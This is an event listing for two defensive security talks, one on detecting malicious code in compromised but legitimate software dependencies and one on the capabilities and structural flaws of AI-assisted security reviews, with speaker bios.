Malicious Code in Legitimate Deps & AI Security Reviews: The Road Ahead
About this Event
The Compromised Maintainer Problem: Detecting Malicious Code in Legitimate Dependencies with Amro Haddadah
Supply chain attacks have changed. A few years ago the story was typosquatting and obviously sketchy packages with five downloads. Today it’s the opposite. Attackers are going after the packages you already trust, the ones with millions of weekly installs and maintainers you have heard of. XZ Utils, the wave of npm maintainer account takeovers, self-replicating worms like Shai-Hulud, leaked PyPI tokens in public CI logs. The pattern is consistent and it is getting worse.
The hard part is that traditional tooling does not catch any of this. SCA scanners look for known CVEs, but there is no advisory yet. The package name is legitimate. The signature checks out. By the time the ecosystem catches up, the malicious version has already shipped to production for thousands of teams.
In this session we will share what we have learned at cyberxyz.io building detection for these attacks across npm, PyPI, NuGet and Go. We will walk through a few recent real incidents, the behavioral signals that gave them away (suspicious postinstall scripts, network callbacks, obfuscated payloads, weird maintainer activity), and why waiting for a CVE will always leave you exposed. From there we will get practical: pre install scanning, sandboxing build steps, lockfile pinning with provenance, and monitoring for dependency drift over time.
The talk is aimed at AppSec engineers, platform teams, and developers who own anything in the CI/CD or dependency policy world.
Key Takeaways:
1. Legitimate does not mean safe. The threat model has shifted from fake packages to compromised real ones, and your defenses probably have not caught up.
2. Why SCA tools, SBOMs, and CVE feeds are structurally too slow for this class of attack.
3. The behavioral signals that actually catch malicious package versions before anyone files an advisory.
4. A defense in depth approach that covers pre install, build time, and runtime, with concrete things you can ship next week.
About Amro Haddadah
Founder of CyberXYZ Security and Cybersecurity researcher and leader specializing in advanced malicious packages detection, 0-day vulnerabilities, threat detection, supply chain security, and AI-driven vulnerability research.
AI Security Reviews: Power, Flaws, and the Road Ahead with Caelan Drayer
AI tools are increasingly used for security reviews, and they produce genuinely impressive results. This talk takes a build-then-break approach to understanding why that is both exciting and dangerous.
The first half shows what AI-assisted review can do: scanning for common vulnerability patterns, coordinating multi-agent audit workflows where specialized reviewers build on each other's findings, and evaluating architecture for design-level security concerns. For known patterns, these tools are fast, thorough, and newly accessible.
The second half dismantles that confidence through five structural flaws. Context window limits mean AI reviews code like reading a novel by flipping to random pages. Models report vulnerabilities with full confidence that don't exist. Training biases catch well-known vulnerability classes while business logic flaws slip through. No runtime context means the AI knows nothing about deployment or infrastructure. And underlying all of it: pattern matching is not understanding.
The talk closes with the broader risks of a world where AI writes the code it also reviews. When millions of developers use the same models, they ship the same blind spots. Developers lose understanding of the code they accept. Review can't keep pace with AI-speed output. And models trained on decades of insecure practices faithfully reproduce them.
The goal is not to discourage AI in security workflows, but to be precise about where it falls flat so practitioners can build around it.
Key Takeaways:
1. AI is pattern matching, not understanding. That distinction explains every capability it has and every way it fails.
2. AI security review has five structural flaws that better models won't fix: limited context windows, hallucinated findings, bias toward common vulnerability classes, no awareness of runtime or deployment, and no actual comprehension of what the code does.
3. When developers use the same models, the result is shared blind spots at scale, lost understanding of shipped code, review that can't keep pace with output, and insecure training data that compounds through each generation.
4. AI findings are a starting point, not a conclusion. Teams that treat them as authoritative will miss the issues that matter most.
5. Security processes built for human-speed development don't work when code is produced at 5-10x that rate. The pipeline needs to evolve.
About Caelan Drayer
I work at Dyrand Systems, an IT Managed Service Provider in Vancouver. A significant part of my role is acting as a vCIO, advising clients on AI adoption - the advantages, the risks, and the practical issues that come with deploying these tools in real environments.
Outside of work, I have a strong personal interest in AI and have spent considerable time testing different tools, learning how to orchestrate workflows, and pushing to see what actually delivers results. That led me to build cAgents (https://github.com/CaelanDrayer/cAgents), to test security reviews, code audits, design, and more.
This talk grew directly out of that combination of professional and personal experience: watching AI produce outputs that looked authoritative, then systematically testing where and how it broke down. I use these tools daily and have developed a clear sense of where they deliver and where they fall flat.
Where is it happening?
Event Location & Nearby Stays:
USD 0.00
